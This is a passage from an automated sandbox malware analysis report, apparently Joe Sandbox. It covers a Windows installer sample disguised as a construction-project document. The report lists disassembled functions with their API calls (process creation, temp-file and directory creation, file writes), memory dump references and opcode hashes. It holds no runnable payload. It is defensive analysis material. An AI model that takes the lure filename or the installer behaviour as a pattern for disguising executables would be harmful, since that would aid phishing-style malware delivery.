                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1912718029-0
                                                                                                                          • Opcode ID: b609a681d442e7482c58967ee8632616faae616d75f86d849c2a2114115373ce
                                                                                                                          • Instruction ID: 973325e0aa9a645a651b6ee30753ebbcc0ecd75d5609573519e3086a48bf95c6
                                                                                                                          • Opcode Fuzzy Hash: b609a681d442e7482c58967ee8632616faae616d75f86d849c2a2114115373ce
                                                                                                                          • Instruction Fuzzy Hash: 31113A71904008FEEF229F90DE89EAE3B79FB54348F104476FA05B11A0D3B59E51EA69
                                                                                                                          Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 756 10001759-10001795 call 10001b18 760 100018a6-100018a8 756->760 761 1000179b-1000179f 756->761 762 100017a1-100017a7 call 10002286 761->762 763 100017a8-100017b5 call 100022d0 761->763 762->763 768 100017e5-100017ec 763->768 769 100017b7-100017bc 763->769 770 1000180c-10001810 768->770 771 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 768->771 772 100017d7-100017da 769->772 773 100017be-100017bf 769->773 774 10001812-1000184c call 100015b4 call 100024a9 770->774 775 1000184e-10001854 call 100024a9 770->775 797 10001855-10001859 771->797 772->768 776 100017dc-100017dd call 10002b5f 772->776 778 100017c1-100017c2 773->778 779 100017c7-100017c8 call 100028a4 773->779 774->797 775->797 791 100017e2 776->791 780 100017c4-100017c5 778->780 781 100017cf-100017d5 call 10002645 778->781 788 100017cd 779->788 780->768 780->779 796 100017e4 781->796 788->791 791->796 796->768 800 10001896-1000189d 797->800 801 1000185b-10001869 call 1000246c 797->801 800->760 803 1000189f-100018a0 GlobalFree 800->803 806 10001881-10001888 801->806 807 1000186b-1000186e 801->807 803->760 806->800 809 1000188a-10001895 call 1000153d 806->809 807->806 808 10001870-10001878 807->808 808->806 810 1000187a-1000187b FreeLibrary 808->810 809->800 810->806
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                                                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1791698881-3916222277
                                                                                                                          • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                          • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                                                          Function 00405C27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00405C45
                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-678247507
                                                                                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                                          • Instruction ID: 7ad1723431e3bc490b0335289974808f62bfc0c3cb5a7c029972da154e4cc245
                                                                                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                                          • Instruction Fuzzy Hash: B9F09676604308BBEB009F59DC45E9BB7A8EB91710F10803AEA00E7140E2B0AD548B54
                                                                                                                          Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                          • WriteFile.KERNELBASE(0040BE90,0040E2D5,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                          • SetFilePointer.KERNELBASE(0018B977,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2146148272-0
                                                                                                                          • Opcode ID: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                                          • Instruction ID: 5e1569cfb0b545446f3df2febc41285ecf4c3109a81fe664ff5153a665b75745
                                                                                                                          • Opcode Fuzzy Hash: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                                          • Instruction Fuzzy Hash: D9418B72504205DFDB109F29EE84AA63BADF74431671441BFE605B22E1C7B96D418BAC
                                                                                                                          Function 00405703 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 00405716
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: Error launching installer
                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                          • Opcode ID: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                                          • Instruction ID: 68da1b5efeb229702bef63955ccdeefd44cba6198d5a5f20aa9a51b41b675f94
                                                                                                                          • Opcode Fuzzy Hash: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                                          • Instruction Fuzzy Hash: 59E0BFB4A0420ABFFB109F64EC49F7B766CE710704F808521BD15F2250D7B4AC108A79
                                                                                                                          Function 00403326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406283
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406297
                                                                                                                            • Part of subcall function 00406220: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004062AA
                                                                                                                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00403347
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 4115351271-517883005
                                                                                                                          • Opcode ID: 39a545118ff9827536aa834da4382a8a1ba00f0c03fbe255a403a3aa64501383
                                                                                                                          • Instruction ID: c6abd0214a64de7cadaa734fac41eb8380666afbcf661e8bafaab08763a3f1d5
                                                                                                                          • Opcode Fuzzy Hash: 39a545118ff9827536aa834da4382a8a1ba00f0c03fbe255a403a3aa64501383
                                                                                                                          • Instruction Fuzzy Hash: 37D0522210A93130C84136663E02BCF080CCF0A32AF22807BF804B00C1CB3C1A8208FE
                                                                                                                          Function 00406A16 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                                          • Instruction ID: 341b99abf03f2e1941eb6220a2ba2fa20bbc036e9949a5bf9c2c078605d2769f
                                                                                                                          • Opcode Fuzzy Hash: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                                          • Instruction Fuzzy Hash: 9DA13471E00229DBDB28CFA8C8547ADBBB1FF48305F11816AD856BB281C7785A96CF44
                                                                                                                          Function 00406C17 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                                                                                          • Instruction ID: b24004e2459b3715c883c1996b24246953ff0fb47fcdf85fedfa1614f6e92f62
                                                                                                                          • Opcode Fuzzy Hash: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                                                                                          • Instruction Fuzzy Hash: 60911270E00228DBDF28CF98C854BADBBB1FF44305F15816AD856BB291C7789996CF44
                                                                                                                          Function 0040692D Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                                          • Instruction ID: 0c07c17b414ad8f17a3ff3e8587382d040bd297e960d91c66a6d9af6720fecf2
                                                                                                                          • Opcode Fuzzy Hash: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                                          • Instruction Fuzzy Hash: 38815571D00228DFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7389A96CF54
                                                                                                                          Function 00406432 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                                                                                          • Instruction ID: 40c7cf361161e00566e5adfab28d3a5c75941d24eb7bbcfefb24c15ac497d971
                                                                                                                          • Opcode Fuzzy Hash: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                                                                                          • Instruction Fuzzy Hash: 91815571D04228DBDF28CFA8C844BADBBB1FB44345F21816AD856BB2C1C7785A96CF45
                                                                                                                          Function 00406880 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                                                                                          • Instruction ID: 456f5d8fd794945b55b5d9b3679d3b1ecbaa17202882ac546044f61b7aaf63b3
                                                                                                                          • Opcode Fuzzy Hash: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                                                                                          • Instruction Fuzzy Hash: 10711471D04228DFDF28CF98C844BADBBB1FB48305F15806AD856BB281D7389996DF54
                                                                                                                          Function 0040699E Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                                                                                          • Instruction ID: 8bd2b1db5987d4e4b96b583130c6a33f56c1bdc1121660429b57e4b15e5e4dee
                                                                                                                          • Opcode Fuzzy Hash: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
